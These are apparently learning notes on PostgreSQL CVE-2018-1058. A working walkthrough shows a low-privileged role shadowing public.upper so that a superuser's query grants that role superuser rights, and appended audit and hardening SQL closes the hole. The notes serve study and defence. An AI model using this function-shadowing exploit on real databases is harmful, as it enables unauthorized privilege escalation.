0. Reference documents and introduction:
1. The Prophet Community, by the expert Chybeta: "PostgreSQL Remote Code Execution Vulnerability Analysis and Utilization (CVE-2018-1058)" (an article)
2. Blog Park, by Hunchill: "Installation and Use of PostgreSQL on Mac" (an article)
I. PostgreSQL environment setup:
Install PostgreSQL on your Mac and start it:
    brew install postgresql
    brew services start postgresql
II. Create the users and configure the environment:
1. Initialize the database. I forget whether it is installation or initialization that generates the superuser; my superuser is my hostname, and bobac is used in its place here.
    brew services stop postgresql
    initdb /usr/local/var/postgres -E UTF8
    brew services start postgresql
2. Create a regular user:
    createuser evil -P
3. Create a database:
    createdb evil -O evil -E UTF8 -e
III. Analysis of the principle:
The vulnerability works by defining an overloaded function in the public schema that carries malicious code. When another account, especially a high-privileged one, later calls this function, the malicious code runs with that account's privileges, which achieves the purpose of remote malicious code execution.
IV. Example walkthrough (reference)
1. Create a table and insert data (run as evil):
    CREATE TABLE public.hehehehe AS SELECT 'evil'::varchar AS contents;
2. Define the function (run as evil):
    CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
        ALTER ROLE evil SUPERUSER;
        SELECT pg_catalog.upper($1);
    $$ LANGUAGE SQL VOLATILE;
3. Use the upper function in a query (run as bobac):
    SELECT upper(contents) FROM hehehehe;
At this point, ALTER ROLE evil SUPERUSER has been executed.
4. Then view the user rights:
    SELECT rolname, rolsuper FROM pg_roles;
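To check a database for the condition described above and to close it, the following audit and hardening statements can be used. This is an added example, not part of the original notes or the referenced articles; it assumes the evil database and the evil and bobac roles from the walkthrough, and is run as a superuser.

```sql
-- Added example. Keep this session from resolving anything through public.
SET search_path = pg_catalog;

-- 1. Audit: functions outside pg_catalog that reuse a built-in function name.
--    public.upper(varchar) is an exact match for a varchar argument, so it is
--    chosen over pg_catalog.upper(text), which would need an implicit cast.
SELECT n.nspname AS schema_name,
       p.proname AS function_name,
       pg_catalog.pg_get_function_identity_arguments(p.oid) AS arguments,
       pg_catalog.pg_get_userbyid(p.proowner) AS owner
FROM pg_catalog.pg_proc AS p
JOIN pg_catalog.pg_namespace AS n ON n.oid = p.pronamespace
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
  AND EXISTS (
        SELECT 1
        FROM pg_catalog.pg_proc AS b
        JOIN pg_catalog.pg_namespace AS bn ON bn.oid = b.pronamespace
        WHERE bn.nspname = 'pg_catalog'
          AND b.proname = p.proname)
ORDER BY schema_name, function_name;
-- After the walkthrough this lists public.upper(character varying), owner evil.

-- 2. Audit: roles that can still create objects in the public schema.
--    Superusers always appear here; any ordinary role in the list is a risk.
SELECT rolname, rolsuper
FROM pg_catalog.pg_roles
WHERE pg_catalog.has_schema_privilege(rolname, 'public', 'CREATE')
ORDER BY rolname;

-- 3. Undo the walkthrough: remove the privilege and the shadowing function.
ALTER ROLE evil NOSUPERUSER;
DROP FUNCTION public.upper(varchar);

-- 4. Harden: ordinary roles can no longer create objects in public, and the
--    privileged role no longer searches public for unqualified names.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
ALTER ROLE bobac SET search_path = "$user";
```

The REVOKE applies per database, so it has to be repeated in every database, including template1 if new databases should inherit it. The ALTER ROLE setting takes effect in bobac's next session.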
PostgreSQL Remote Code Execution Vulnerability (CVE-2018-1058) Learning Notes